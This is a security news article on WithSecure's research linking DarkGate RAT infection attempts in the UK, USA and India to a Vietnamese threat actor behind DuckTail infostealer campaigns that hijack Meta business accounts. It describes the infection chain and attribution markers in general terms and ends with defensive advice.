The cybersecurity researchers at WithSecure have identified a connection between Vietnamese DuckTail infostealer and DarkGate malware.
- Vietnamese cybercrime groups are actively targeting organizations in the UK, USA, and India with various MaaS infostealers and RATs, reports WithSecure cybersecurity firm.
- A connection is noticed between recent DarkGate malware attacks and the group running a campaign to hijack Meta business accounts because both attacks use the same infrastructure.
Cybersecurity firm WithSecure, formerly F-Secure Business, has uncovered a link between the recent DarkGate malware attacks targeting its customers and Vietnam-based threat actors operating a campaign to hijack Meta business accounts and steal sensitive data.
According to WithSecure’s Detection and Response Team (DRT), multiple infection attempts with DarkGate malware were made against their clients’ organizations in the UK, USA, and India on 4 August 2023.
The lure documents, target patterns, themes, delivery methods, and overall attack tactics closely resemble the attack mechanism observed in the recent DuckTail infostealer campaigns. WithSecure has been tracking this infostealer for over a year.
DarkGate is a Remote Access Trojan (RAT) that first emerged in cyberspace in 2018. It is usually offered as a Malware-as-a-Service (MaaS) tool to cyber criminals. It is a versatile malware employed in various malicious activities such as cryptojacking, information theft, and ransomware attacks.
WithSecure researchers analyzed open-source data linked to the DarkGate malware campaign and established links to multiple infostealers. This pattern indicates that the same group or threat actor is launching these attacks.
“By identifying characteristics of DarkGate malware lures and campaigns, we have been able to find multiple pivot points which lead to other information stealers and malware being used in very similar if not identical campaigns, and it is assessed as likely that the same threat actor group performs these campaigns” read WithSecure’s report.
The attack commenced with a file named ‘Salary and new products.8.4.zip.’ Once unwitting users downloaded and extracted it, a VBS script was activated. This script renamed and duplicated the original Windows binary (Curl.exe) to a new location, connecting to an external server to retrieve two additional files: autoit3.exe and a compiled Autoit3 script. Subsequently, the script executed the executable, de-obfuscated, and assembled the DarkGate RAT using strings within the script.
WithSecure found strong identifiers that helped the company establish links between the two campaigns. They also noted that the attackers used many different malware and infostealers, including Ducktail, Redline Stealer, and Lobshot.
“Based on what we’ve observed, it is very likely that a single actor is behind several of the campaigns we’ve been tracking that target Meta Business accounts,” stated WithSecure™ Senior Threat Intelligence Analyst Stephen Robinson in a blog post.
After obtaining control of an account, they can perform miscellaneous malicious activities, including distributing malware and conducting frauds. The lures and malicious documents used in the campaigns have similar identifiable metadata, including:
- LNK Drive ID
- MSI file metadata
- Canva PDF design service account details
These distinctive markets are digital fingerprints, helping researchers link disparate campaigns to a single actor. However, many other groups could be using the same malware, which highlights the need to dig deep and find similarities in attack patterns rather than relying on malware-based analysis.
“DarkGate has been around for a long time and is being used by many groups for different purposes, not just this group or cluster in Vietnam,” Stephen Robinson, Senior Threat Intelligence Analyst at WithSecure™, explains.
Organizations must remain vigilant and employ stringent cybersecurity mechanisms to prevent DarkGate and other malware threats. It is essential to ensure up-to-date antivirus solutions, educate employees on cybersecurity best practices, use strong passwords backed by MFA (multi-factor authentication), and monitor network activity for suspicious behavior.